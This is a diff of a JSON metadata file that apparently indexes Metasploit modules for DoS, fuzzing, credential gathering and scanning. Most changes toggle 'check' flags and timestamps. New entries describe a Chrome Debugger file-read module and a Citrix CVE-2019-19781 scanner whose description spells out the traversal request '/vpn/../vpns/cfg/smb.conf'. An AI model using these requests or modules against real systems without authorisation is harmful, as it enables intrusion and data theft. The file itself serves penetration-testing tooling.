+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
  "auxiliary_dos/http/monkey_headers": {
    "name": "Monkey HTTPD Header Parsing Denial of Service (DoS)",
    "fullname": "auxiliary/dos/http/monkey_headers",
@@ -10990,7 +11074,7 @@
    "path": "/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb",
    "is_install_path": true,
    "ref_name": "dos/ntp/ntpd_reserved_dos",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -11070,7 +11154,7 @@
    "path": "/modules/auxiliary/dos/rpc/rpcbomb.rb",
    "is_install_path": true,
    "ref_name": "dos/rpc/rpcbomb",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -11242,7 +11326,7 @@
    "path": "/modules/auxiliary/dos/sap/sap_soap_rfc_eps_delete_file.rb",
    "is_install_path": true,
    "ref_name": "dos/sap/sap_soap_rfc_eps_delete_file",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -12156,7 +12240,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-08-24 21:38:44 +0000",
+    "mod_time": "2019-11-29 07:15:17 +0000",
    "path": "/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb",
    "is_install_path": true,
    "ref_name": "dos/windows/ftp/iis75_ftpd_iac_bof",
@@ -13619,11 +13703,11 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-12-07 08:01:52 +0000",
    "path": "/modules/auxiliary/fuzzers/dns/dns_fuzzer.rb",
    "is_install_path": true,
    "ref_name": "fuzzers/dns/dns_fuzzer",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -13698,7 +13782,7 @@
    "path": "/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb",
    "is_install_path": true,
    "ref_name": "fuzzers/ftp/ftp_pre_post",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -13856,7 +13940,7 @@
    "path": "/modules/auxiliary/fuzzers/ntp/ntp_protocol_fuzzer.rb",
    "is_install_path": true,
    "ref_name": "fuzzers/ntp/ntp_protocol_fuzzer",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -14168,7 +14252,7 @@
    "path": "/modules/auxiliary/fuzzers/smtp/smtp_fuzzer.rb",
    "is_install_path": true,
    "ref_name": "fuzzers/smtp/smtp_fuzzer",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -15082,7 +15166,7 @@
    "path": "/modules/auxiliary/gather/c2s_dvr_password_disclosure.rb",
    "is_install_path": true,
    "ref_name": "gather/c2s_dvr_password_disclosure",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -15166,7 +15250,7 @@
    "path": "/modules/auxiliary/gather/cerberus_helpdesk_hash_disclosure.rb",
    "is_install_path": true,
    "ref_name": "gather/cerberus_helpdesk_hash_disclosure",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -15211,6 +15295,53 @@
    },
    "needs_cleanup": false
  },
+  "auxiliary_gather/chrome_debugger": {
+    "name": "Chrome Debugger Arbitrary File Read / Arbitrary Web Request",
+    "fullname": "auxiliary/gather/chrome_debugger",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2019-09-24",
+    "type": "auxiliary",
+    "author": [
+      "Adam Baldwin (Evilpacket)",
+      "Nicholas Starke (The King Pig Demon)"
+    ],
+    "description": "This module uses the Chrome Debugger's API to read\n        files off the remote file system, or to make web requests\n        from a remote machine.  Useful for cloud metadata endpoints!",
+    "references": [
+
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 9222,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2019-12-12 09:57:10 +0000",
+    "path": "/modules/auxiliary/gather/chrome_debugger.rb",
+    "is_install_path": true,
+    "ref_name": "gather/chrome_debugger",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
  "auxiliary_gather/cisco_rv320_config": {
    "name": "Cisco RV320/RV326 Configuration Disclosure",
    "fullname": "auxiliary/gather/cisco_rv320_config",
@@ -16095,11 +16226,11 @@

    ],
    "targets": null,
-    "mod_time": "2018-08-27 16:06:07 +0000",
+    "mod_time": "2019-11-01 19:20:22 +0000",
    "path": "/modules/auxiliary/gather/get_user_spns.py",
    "is_install_path": true,
    "ref_name": "gather/get_user_spns",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -16140,7 +16271,7 @@
    "path": "/modules/auxiliary/gather/hp_enum_perfd.rb",
    "is_install_path": true,
    "ref_name": "gather/hp_enum_perfd",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -16642,7 +16773,7 @@
    "path": "/modules/auxiliary/gather/ipcamera_password_disclosure.rb",
    "is_install_path": true,
    "ref_name": "gather/ipcamera_password_disclosure",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -16954,7 +17085,7 @@
    "path": "/modules/auxiliary/gather/konica_minolta_pwd_extract.rb",
    "is_install_path": true,
    "ref_name": "gather/konica_minolta_pwd_extract",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -17135,7 +17266,7 @@
    "path": "/modules/auxiliary/gather/memcached_extractor.rb",
    "is_install_path": true,
    "ref_name": "gather/memcached_extractor",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -17305,7 +17436,7 @@
    "path": "/modules/auxiliary/gather/natpmp_external_address.rb",
    "is_install_path": true,
    "ref_name": "gather/natpmp_external_address",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -17394,7 +17525,7 @@

    ],
    "targets": null,
-    "mod_time": "2018-01-13 22:55:01 +0000",
+    "mod_time": "2020-01-16 14:21:09 +0000",
    "path": "/modules/auxiliary/gather/nis_bootparamd_domain.rb",
    "is_install_path": true,
    "ref_name": "gather/nis_bootparamd_domain",
@@ -17432,7 +17563,7 @@

    ],
    "targets": null,
-    "mod_time": "2018-01-13 22:55:01 +0000",
+    "mod_time": "2020-01-16 14:21:09 +0000",
    "path": "/modules/auxiliary/gather/nis_ypserv_map.rb",
    "is_install_path": true,
    "ref_name": "gather/nis_ypserv_map",
@@ -17713,7 +17844,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2019-10-31 13:07:41 +0000",
+    "mod_time": "2020-01-14 00:34:06 +0000",
    "path": "/modules/auxiliary/gather/pulse_secure_file_disclosure.rb",
    "is_install_path": true,
    "ref_name": "gather/pulse_secure_file_disclosure",
@@ -18366,7 +18497,7 @@
    "path": "/modules/auxiliary/gather/windows_deployment_services_shares.rb",
    "is_install_path": true,
    "ref_name": "gather/windows_deployment_services_shares",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -18510,7 +18641,7 @@
    "path": "/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb",
    "is_install_path": true,
    "ref_name": "gather/wp_w3_total_cache_hash_extract",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -18891,7 +19022,7 @@
    "path": "/modules/auxiliary/scanner/acpp/login.rb",
    "is_install_path": true,
    "ref_name": "scanner/acpp/login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -18929,7 +19060,7 @@
    "path": "/modules/auxiliary/scanner/afp/afp_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/afp/afp_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -18966,7 +19097,7 @@
    "path": "/modules/auxiliary/scanner/afp/afp_server_info.rb",
    "is_install_path": true,
    "ref_name": "scanner/afp/afp_server_info",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -19005,7 +19136,7 @@
    "path": "/modules/auxiliary/scanner/backdoor/energizer_duo_detect.rb",
    "is_install_path": true,
    "ref_name": "scanner/backdoor/energizer_duo_detect",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -19043,7 +19174,7 @@
    "path": "/modules/auxiliary/scanner/chargen/chargen_probe.rb",
    "is_install_path": true,
    "ref_name": "scanner/chargen/chargen_probe",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -19140,7 +19271,7 @@
    "path": "/modules/auxiliary/scanner/couchdb/couchdb_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/couchdb/couchdb_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -19177,7 +19308,7 @@
    "path": "/modules/auxiliary/scanner/db2/db2_auth.rb",
    "is_install_path": true,
    "ref_name": "scanner/db2/db2_auth",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -19214,7 +19345,7 @@
    "path": "/modules/auxiliary/scanner/db2/db2_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/db2/db2_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -19251,7 +19382,7 @@
    "path": "/modules/auxiliary/scanner/db2/discovery.rb",
    "is_install_path": true,
    "ref_name": "scanner/db2/discovery",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -19288,7 +19419,7 @@
    "path": "/modules/auxiliary/scanner/dcerpc/endpoint_mapper.rb",
    "is_install_path": true,
    "ref_name": "scanner/dcerpc/endpoint_mapper",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -19325,7 +19456,7 @@
    "path": "/modules/auxiliary/scanner/dcerpc/hidden.rb",
    "is_install_path": true,
    "ref_name": "scanner/dcerpc/hidden",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -19362,7 +19493,7 @@
    "path": "/modules/auxiliary/scanner/dcerpc/management.rb",
    "is_install_path": true,
    "ref_name": "scanner/dcerpc/management",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -19399,7 +19530,7 @@
    "path": "/modules/auxiliary/scanner/dcerpc/tcp_dcerpc_auditor.rb",
    "is_install_path": true,
    "ref_name": "scanner/dcerpc/tcp_dcerpc_auditor",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -19437,7 +19568,7 @@
    "path": "/modules/auxiliary/scanner/dcerpc/windows_deployment_services.rb",
    "is_install_path": true,
    "ref_name": "scanner/dcerpc/windows_deployment_services",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -19548,7 +19679,7 @@
    "path": "/modules/auxiliary/scanner/discovery/arp_sweep.rb",
    "is_install_path": true,
    "ref_name": "scanner/discovery/arp_sweep",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -19585,7 +19716,7 @@
    "path": "/modules/auxiliary/scanner/discovery/empty_udp.rb",
    "is_install_path": true,
    "ref_name": "scanner/discovery/empty_udp",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -19659,7 +19790,7 @@
    "path": "/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb",
    "is_install_path": true,
    "ref_name": "scanner/discovery/ipv6_neighbor",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -19734,7 +19865,7 @@
    "path": "/modules/auxiliary/scanner/discovery/udp_probe.rb",
    "is_install_path": true,
    "ref_name": "scanner/discovery/udp_probe",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -19771,7 +19902,7 @@
    "path": "/modules/auxiliary/scanner/discovery/udp_sweep.rb",
    "is_install_path": true,
    "ref_name": "scanner/discovery/udp_sweep",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -19849,7 +19980,7 @@
    "path": "/modules/auxiliary/scanner/dns/dns_amp.rb",
    "is_install_path": true,
    "ref_name": "scanner/dns/dns_amp",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -19895,7 +20026,7 @@
    "path": "/modules/auxiliary/scanner/elasticsearch/indices_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/elasticsearch/indices_enum",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -19932,7 +20063,7 @@
    "path": "/modules/auxiliary/scanner/emc/alphastor_devicemanager.rb",
    "is_install_path": true,
    "ref_name": "scanner/emc/alphastor_devicemanager",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -19969,7 +20100,7 @@
    "path": "/modules/auxiliary/scanner/emc/alphastor_librarymanager.rb",
    "is_install_path": true,
    "ref_name": "scanner/emc/alphastor_librarymanager",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -20017,7 +20148,7 @@
    "path": "/modules/auxiliary/scanner/etcd/open_key_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/etcd/open_key_scanner",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -20065,7 +20196,7 @@
    "path": "/modules/auxiliary/scanner/etcd/version.rb",
    "is_install_path": true,
    "ref_name": "scanner/etcd/version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -20102,7 +20233,7 @@
    "path": "/modules/auxiliary/scanner/finger/finger_users.rb",
    "is_install_path": true,
    "ref_name": "scanner/finger/finger_users",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -20140,7 +20271,7 @@
    "path": "/modules/auxiliary/scanner/ftp/anonymous.rb",
    "is_install_path": true,
    "ref_name": "scanner/ftp/anonymous",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -20298,7 +20429,7 @@
    "path": "/modules/auxiliary/scanner/ftp/ftp_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/ftp/ftp_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -20336,7 +20467,7 @@
    "path": "/modules/auxiliary/scanner/ftp/ftp_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/ftp/ftp_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -20461,7 +20592,7 @@
    "path": "/modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/ftp/titanftp_xcrc_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -20498,7 +20629,7 @@
    "path": "/modules/auxiliary/scanner/gopher/gopher_gophermap.rb",
    "is_install_path": true,
    "ref_name": "scanner/gopher/gopher_gophermap",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -20537,7 +20668,7 @@
    "path": "/modules/auxiliary/scanner/gprs/gtp_echo.rb",
    "is_install_path": true,
    "ref_name": "scanner/gprs/gtp_echo",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -20574,7 +20705,7 @@
    "path": "/modules/auxiliary/scanner/h323/h323_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/h323/h323_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -20622,7 +20753,7 @@
    "path": "/modules/auxiliary/scanner/http/a10networks_ax_directory_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/a10networks_ax_directory_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -20669,7 +20800,7 @@
    "path": "/modules/auxiliary/scanner/http/accellion_fta_statecode_file_read.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/accellion_fta_statecode_file_read",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -20719,7 +20850,7 @@
    "path": "/modules/auxiliary/scanner/http/adobe_xml_inject.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/adobe_xml_inject",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -20765,7 +20896,7 @@
    "path": "/modules/auxiliary/scanner/http/advantech_webaccess_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/advantech_webaccess_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -20865,7 +20996,7 @@
    "path": "/modules/auxiliary/scanner/http/apache_activemq_source_disclosure.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/apache_activemq_source_disclosure",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -20914,7 +21045,7 @@
    "path": "/modules/auxiliary/scanner/http/apache_activemq_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/apache_activemq_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -21020,7 +21151,7 @@
    "path": "/modules/auxiliary/scanner/http/apache_optionsbleed.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/apache_optionsbleed",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -21071,7 +21202,7 @@
    "path": "/modules/auxiliary/scanner/http/apache_userdir_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/apache_userdir_enum",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -21118,7 +21249,7 @@
    "path": "/modules/auxiliary/scanner/http/appletv_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/appletv_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -21172,7 +21303,7 @@
    "path": "/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/atlassian_crowd_fileaccess",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -21219,7 +21350,7 @@
    "path": "/modules/auxiliary/scanner/http/axis_local_file_include.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/axis_local_file_include",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -21266,7 +21397,7 @@
    "path": "/modules/auxiliary/scanner/http/axis_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/axis_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -21312,7 +21443,7 @@
    "path": "/modules/auxiliary/scanner/http/backup_file.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/backup_file",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -21360,7 +21491,7 @@
    "path": "/modules/auxiliary/scanner/http/barracuda_directory_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/barracuda_directory_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -21406,7 +21537,7 @@
    "path": "/modules/auxiliary/scanner/http/bavision_cam_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/bavision_cam_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -21452,7 +21583,7 @@
    "path": "/modules/auxiliary/scanner/http/binom3_login_config_pass_dump.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/binom3_login_config_pass_dump",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -21503,7 +21634,7 @@
    "path": "/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/bitweaver_overlay_type_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -21549,7 +21680,7 @@
    "path": "/modules/auxiliary/scanner/http/blind_sql_query.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/blind_sql_query",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -21639,11 +21770,11 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-21 16:45:42 +0000",
    "path": "/modules/auxiliary/scanner/http/brute_dirs.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/brute_dirs",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -21689,7 +21820,7 @@
    "path": "/modules/auxiliary/scanner/http/buffalo_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/buffalo_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -21735,7 +21866,7 @@
    "path": "/modules/auxiliary/scanner/http/buildmaster_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/buildmaster_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -21785,7 +21916,7 @@
    "path": "/modules/auxiliary/scanner/http/caidao_bruteforce_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/caidao_bruteforce_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -21833,7 +21964,7 @@
    "path": "/modules/auxiliary/scanner/http/canon_wireless.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/canon_wireless",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -21870,7 +22001,7 @@
    "path": "/modules/auxiliary/scanner/http/cert.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/cert",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -21919,7 +22050,7 @@
    "path": "/modules/auxiliary/scanner/http/cgit_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/cgit_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -21965,7 +22096,7 @@
    "path": "/modules/auxiliary/scanner/http/chef_webui_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/chef_webui_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -22011,7 +22142,7 @@
    "path": "/modules/auxiliary/scanner/http/chromecast_webserver.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/chromecast_webserver",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -22057,7 +22188,7 @@
    "path": "/modules/auxiliary/scanner/http/chromecast_wifi.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/chromecast_wifi",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -22103,7 +22234,7 @@
    "path": "/modules/auxiliary/scanner/http/cisco_asa_asdm.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/cisco_asa_asdm",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -22151,7 +22282,7 @@
    "path": "/modules/auxiliary/scanner/http/cisco_device_manager.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/cisco_device_manager",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -22248,7 +22379,7 @@
    "path": "/modules/auxiliary/scanner/http/cisco_firepower_download.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/cisco_firepower_download",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -22294,7 +22425,7 @@
    "path": "/modules/auxiliary/scanner/http/cisco_firepower_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/cisco_firepower_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -22343,7 +22474,7 @@
    "path": "/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/cisco_ios_auth_bypass",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -22389,7 +22520,7 @@
    "path": "/modules/auxiliary/scanner/http/cisco_ironport_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/cisco_ironport_enum",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -22436,7 +22567,7 @@
    "path": "/modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/cisco_nac_manager_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -22482,7 +22613,7 @@
    "path": "/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/cisco_ssl_vpn",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -22531,13 +22662,64 @@
    "path": "/modules/auxiliary/scanner/http/cisco_ssl_vpn_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/cisco_ssl_vpn_priv_esc",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
    },
    "needs_cleanup": false
  },
+  "auxiliary_scanner/http/citrix_dir_traversal": {
+    "name": "Citrix ADC (NetScaler) Directory Traversal Scanner",
+    "fullname": "auxiliary/scanner/http/citrix_dir_traversal",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2019-12-17",
+    "type": "auxiliary",
+    "author": [
+      "Erik Wynter",
+      "altonjx"
+    ],
+    "description": "This module exploits a directory traversal vulnerability (CVE-2019-19781) within Citrix ADC\n        (NetScaler). It requests the smb.conf file located in the /vpns/cfg directory by issuing the request\n        /vpn/../vpns/cfg/smb.conf. It then checks if the server is vulnerable by looking for the presence of\n        a \"[global]\" directive in smb.conf, which this file should always contain.",
+    "references": [
+      "CVE-2019-19781",
+      "URL-https://support.citrix.com/article/CTX267027/"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2020-01-14 11:21:03 +0000",
+    "path": "/modules/auxiliary/scanner/http/citrix_dir_traversal.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/http/citrix_dir_traversal",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "AKA": [
+        "Shitrix"
+      ]
+    },
+    "needs_cleanup": false
+  },
  "auxiliary_scanner/http/clansphere_traversal": {
    "name": "ClanSphere 2011.3 Local File Inclusion Vulnerability",
    "fullname": "auxiliary/scanner/http/clansphere_traversal",
@@ -22579,7 +22761,7 @@
    "path": "/modules/auxiliary/scanner/http/clansphere_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/clansphere_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -22626,7 +22808,7 @@
    "path": "/modules/auxiliary/scanner/http/cnpilot_r_web_login_loot.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/cnpilot_r_web_login_loot",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -22677,7 +22859,7 @@
    "path": "/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/coldfusion_locale_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -22724,7 +22906,7 @@
    "path": "/modules/auxiliary/scanner/http/coldfusion_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/coldfusion_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -22772,7 +22954,7 @@
    "path": "/modules/auxiliary/scanner/http/concrete5_member_list.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/concrete5_member_list",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -22818,7 +23000,7 @@
    "path": "/modules/auxiliary/scanner/http/copy_of_file.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/copy_of_file",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -22911,7 +23093,7 @@
    "path": "/modules/auxiliary/scanner/http/dell_idrac.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/dell_idrac",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -22958,7 +23140,7 @@
    "path": "/modules/auxiliary/scanner/http/dicoogle_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/dicoogle_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
